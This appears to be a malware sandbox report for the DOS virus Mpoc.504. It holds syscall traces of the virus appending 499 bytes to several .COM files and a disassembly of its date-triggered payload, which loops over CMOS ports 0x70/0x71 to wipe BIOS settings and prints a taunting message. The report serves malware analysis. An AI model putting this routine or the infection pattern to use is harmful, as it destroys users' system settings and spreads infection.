Sample viewer

vx.netlux.org/Virus.DOS.Mpoc.504

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:56:52.194048031Z 26 PC: 12a61 | Set disk transfer address
2018-12-17T22:56:52.195786707Z 78 PC: 12aba | Find first file
2018-12-17T22:56:52.202992709Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.227000701Z 61 PC: 12ad3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:56:52.246788185Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:56:52.256704665Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.274324928Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:56:52.277434105Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.279815749Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 5)
2018-12-17T22:56:52.283190567Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.285440406Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.291971799Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.295095452Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.3016533Z 61 PC: 12ad3 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:56:52.309941491Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 6)
2018-12-17T22:56:52.317203407Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.319383765Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 6)
2018-12-17T22:56:52.322428665Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.325234777Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 6)
2018-12-17T22:56:52.329149191Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.33351676Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.339693679Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.343104057Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.348824884Z 61 PC: 12ad3 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:56:52.361243207Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 7)
2018-12-17T22:56:52.378003616Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.380168858Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 7)
2018-12-17T22:56:52.383671596Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.386644606Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 7)
2018-12-17T22:56:52.390916489Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.393231703Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.399058376Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.402228224Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.422934013Z 61 PC: 12ad3 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:56:52.430575673Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 8)
2018-12-17T22:56:52.438860932Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.440837459Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 8)
2018-12-17T22:56:52.445201383Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.447938177Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 8)
2018-12-17T22:56:52.451240185Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.455041892Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.460379008Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.463522259Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.485581023Z 61 PC: 12ad3 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:56:52.493942752Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 9)
2018-12-17T22:56:52.501775375Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.5041946Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 9)
2018-12-17T22:56:52.508162451Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.511174882Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 9)
2018-12-17T22:56:52.514863353Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.51827309Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.525551006Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.529239508Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.535744682Z 61 PC: 12ad3 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:56:52.543735563Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 10)
2018-12-17T22:56:52.551535001Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.554031204Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 10)
2018-12-17T22:56:52.557276699Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.560050704Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 10)
2018-12-17T22:56:52.564104063Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.566171969Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.571996605Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.575855578Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.581499967Z 61 PC: 12ad3 | Open file (Filename = 'PAH.COM')
2018-12-17T22:56:52.589890882Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 11)
2018-12-17T22:56:52.59820117Z 66 PC: 12b0b | Move file pointer
2018-12-17T22:56:52.60030038Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 11)
2018-12-17T22:56:52.60365063Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-17T22:56:52.606585872Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 11)
2018-12-17T22:56:52.61127556Z 87 PC: 12b37 | Get or set file date and time
2018-12-17T22:56:52.613350859Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:56:52.619134523Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.624153345Z 67 PC: 12aca | Get or set file attributes
2018-12-17T22:56:52.629791511Z 61 PC: 12ad3 | Open file (Filename = 'TEST.COM')
2018-12-17T22:56:52.637437877Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 12)
2018-12-17T22:56:52.642026548Z 79 PC: 12aba | Find next file
2018-12-17T22:56:52.645117591Z 42 PC: 12b52 | Get date 0x12b52: cmp dx, 0x607
0x12b56: je 0x12b5e
0x12b58: nop
0x12b59: nop
0x12b5a: nop
0x12b5b: jmp 0x12b76
0x12b5d: nop
0x12b5e: mov ah, 9
0x12b60: lea dx, word ptr [bp + 0x23b]
0x12b64: int 0x21
0x12b66: mov cx, 0x40
0x12b69: mov ax, cx
0x12b6b: dec ax
0x12b6c: or al, 0x80
0x12b6e: out 0x70, al
0x12b70: xor ax, ax
0x12b72: out 0x71, al
0x12b74: loop 0x12b69
0x12b76: mov si, 0x100
0x12b79: jmp si

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12368,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:32:34.186487136Z 26 PC: 12a61 | Set disk transfer address
2018-12-25T12:32:34.188453253Z 78 PC: 12aba | Find first file
2018-12-25T12:32:34.194510877Z 67 PC: 12aca | Get or set file attributes
2018-12-25T12:32:34.20979003Z 61 PC: 12ad3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:32:34.217378502Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:32:34.223821438Z 66 PC: 12b0b | Move file pointer
2018-12-25T12:32:34.225119531Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:32:34.227773196Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-25T12:32:34.230253854Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:32:34.232989716Z 87 PC: 12b37 | Get or set file date and time
2018-12-25T12:32:34.234501379Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:32:34.239758167Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.24263855Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.248183076Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.255316545Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.261580062Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.263181833Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.266852597Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.268994884Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.271619451Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.273500621Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.278188804Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.2811105Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.286561552Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.29281864Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.299894331Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.303480301Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.306070414Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.308080152Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.313271685Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.315445119Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.320130768Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.323304944Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.32785426Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.334361002Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.341251121Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.342490559Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.344889685Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.347384413Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.350345089Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.352050643Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.358782022Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.361611768Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.366202186Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.372693114Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.379886418Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.381461515Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.384464858Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.387082754Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.389943311Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.391626489Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.39719417Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.399949549Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.404721272Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.412203537Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.418605982Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.420129245Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.423829748Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.426066636Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.428868096Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.431464699Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.436338803Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.439163588Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.445095859Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.452396349Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.458664864Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.463759235Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.466529313Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.46868165Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.472666541Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.474189062Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.4788249Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.481553074Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.487078885Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.49353756Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.497021487Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.499597366Z 42 PC: 12b52 | Get date 0x12b52: cmp dx, 0x607
0x12b56: je 0x12b5e
0x12b58: nop
0x12b59: nop
0x12b5a: nop
0x12b5b: jmp 0x12b76
0x12b5d: nop
0x12b5e: mov ah, 9
0x12b60: lea dx, word ptr [bp + 0x23b]
0x12b64: int 0x21
0x12b66: mov cx, 0x40
0x12b69: mov ax, cx
0x12b6b: dec ax
0x12b6c: or al, 0x80
0x12b6e: out 0x70, al
0x12b70: xor ax, ax
0x12b72: out 0x71, al
0x12b74: loop 0x12b69
0x12b76: mov si, 0x100
0x12b79: jmp si

{"DateBased":true,"Day":7,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12368,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:32:34.25129236Z 26 PC: 12a61 | Set disk transfer address
2018-12-25T12:32:34.253422166Z 78 PC: 12aba | Find first file
2018-12-25T12:32:34.260366226Z 67 PC: 12aca | Get or set file attributes
2018-12-25T12:32:34.277314731Z 61 PC: 12ad3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:32:34.284619407Z 63 PC: 12adf | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:32:34.292480268Z 66 PC: 12b0b | Move file pointer
2018-12-25T12:32:34.294099791Z 64 PC: 12b16 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:32:34.297299725Z 2 PC: 12b1d | Character output (Char = '00')
2018-12-25T12:32:34.301012927Z 64 PC: 12b28 | Write file or device (Write 499 bytes on handle 5)
2018-12-25T12:32:34.303981487Z 87 PC: 12b37 | Get or set file date and time
2018-12-25T12:32:34.305663103Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T12:32:34.319605672Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.322480915Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.328160136Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.335666127Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.342880866Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.344411851Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.347441071Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.349868413Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.352701348Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.354231257Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.359625134Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.362244328Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.367186353Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.374705504Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.381759526Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.383349213Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.38686074Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.389882436Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.392573026Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.394596182Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.399872423Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.402763933Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.408731778Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.416102208Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.423052156Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.42471281Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.427726784Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.430034971Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.433234254Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.435161522Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.440825594Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.444805513Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.450378308Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.458359164Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.465359134Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.467704453Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.470656387Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.472905374Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.476582163Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.47862796Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.483878323Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.487029912Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.492196204Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.49931601Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.506863132Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.508313751Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.511109226Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.513826649Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.516814978Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.518424089Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.524932781Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.527845777Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.532801468Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.539976331Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.547034725Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T12:32:34.548612904Z 64 PC: 12b16 | Write file or device (See above)
2018-12-25T12:32:34.551550996Z 2 PC: 12b1d | Character output (See above)
2018-12-25T12:32:34.554094014Z 64 PC: 12b28 | Write file or device (See above)
2018-12-25T12:32:34.557124549Z 87 PC: 12b37 | Get or set file date and time (See above)
2018-12-25T12:32:34.558837594Z 67 PC: 12b45 | Get or set file attributes (See above)
2018-12-25T12:32:34.564991528Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.56790197Z 67 PC: 12aca | Get or set file attributes (See above)
2018-12-25T12:32:34.573182622Z 61 PC: 12ad3 | Open file (See above)
2018-12-25T12:32:34.581229102Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:32:34.585798889Z 79 PC: 12aba | Find next file (See above)
2018-12-25T12:32:34.588813963Z 42 PC: 12b52 | Get date 0x12b52: cmp dx, 0x607
0x12b56: je 0x12b5e
0x12b58: nop
0x12b59: nop
0x12b5a: nop
0x12b5b: jmp 0x12b76
0x12b5d: nop
0x12b5e: mov ah, 9
0x12b60: lea dx, word ptr [bp + 0x23b]
0x12b64: int 0x21
0x12b66: mov cx, 0x40
0x12b69: mov ax, cx
0x12b6b: dec ax
0x12b6c: or al, 0x80
0x12b6e: out 0x70, al
0x12b70: xor ax, ax
0x12b72: out 0x71, al
0x12b74: loop 0x12b69
0x12b76: mov si, 0x100
0x12b79: jmp si
2018-12-25T12:32:34.592511898Z 9 PC: 12b66 | Display string (String= 'Message recieved from M-POC Generation 2: I�ve killed your C-MOS settings. HAHAHA!!! The BugHunter is outta here !!! :)')